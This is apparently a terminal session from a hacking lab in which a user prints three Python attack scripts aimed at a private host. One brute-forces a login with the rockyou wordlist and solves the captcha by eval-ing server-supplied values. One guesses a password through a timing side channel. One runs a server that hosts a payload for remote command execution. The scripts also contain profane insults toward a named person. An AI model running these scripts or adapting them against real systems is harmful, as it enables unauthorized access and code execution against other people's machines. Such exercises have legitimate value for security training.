$ ls *.pyevil.py loginpage.py timing.pyclin_is_awesome@clin-is-awesome:~$

1. $ ls *.py
2. evil.py loginpage.py timing.py
3. clin_is_awesome@clin-is-awesome:~$ cat loginpage.py
4. import requests
5. import json
6.  
7.  
8. def checkint(s):
9. try:
10. int(s)
11. return True
12. except ValueError:
13. return False
14.  
15.  
16. s = requests.Session()
17.  
18. capcha = 'fuckcolin'
19. password = 'colinisadick'
20. success = False
21.  
22. with open('/home/clin_is_awesome/rockyou.txt', 'r') as fin:
23. for line in fin:
24.  
25. payload = {'capcha': capcha, 'password':password}
26. response = s.post('http://10.0.2.4/ajax_login_capcha', data=payload)
27. j = response.json()
28. #print("password:" + password)
29. #print(j)
30. if j['success'] == True:
31. break
32. v1 = j['value1']
33. v2 = j['value2']
34. op = j['operator']
35.  
36. if checkint(v1) and checkint(v2):
37. expr = (v1 + op + v2)
38. capcha = eval(expr)
39. password = line.strip()
40. print ('I win and clin can get fucked')
41. print ('password: ' + password)
42. print (j)
43.  
44.  
45. clin_is_awesome@clin-is-awesome:~$ cat timing.py
46. import socket
47. import sys
48. import time
49.  
50.  
51. #print >>sys.stderr, 'connecting to %s port %s' % server_address
52.  
53. def makeGuess(guess):
54.  
55. #print('guessing: ' + guess)
56. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
57. addr = ('10.0.2.4', 19391)
58. result = False
59. sock.connect(addr)
60. try:
61. response = sock.recv(1024).decode()
62. t1 = time.time()
63. sock.sendall(guess.encode())
64. response = sock.recv(1024).decode()
65. t2 = time.time()
66. if t2 - t1 > 0.1:
67. print ('successfull guess: ' + guess)
68. result = True
69. finally:
70. sock.close()
71. if 'Invalid Password' not in response:
72. print response
73. return result
74.  
75.  
76. pw = ''
77.  
78. chars = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'
79.  
80. clinsucks = False
81. found = False
82.  
83. while clinsucks == False:
84. for char in chars:
85. test = pw + char
86. if makeGuess(test) == True:
87. pw = test
88. found = True
89. if found == False:
90. print('didn\'t find squat. Giving up')
91. break
92.  
93.  
94. clin_is_awesome@clin-is-awesome:~$ cat evil.py
95. import cherrypy
96. import os
97. import subprocess
98.  
99.  
100. class HelloWorld(object):
101. @cherrypy.expose
102. def status_py(self):
103. return "import subprocess; foo = subprocess.check_output(['id'], stderr=subprocess.STDOUT); print(foo)"
104.  
105. cherrypy.config.update({'server.socket_port': 34321 })
106. cherrypy.engine.restart()
107. cherrypy.quickstart(HelloWorld())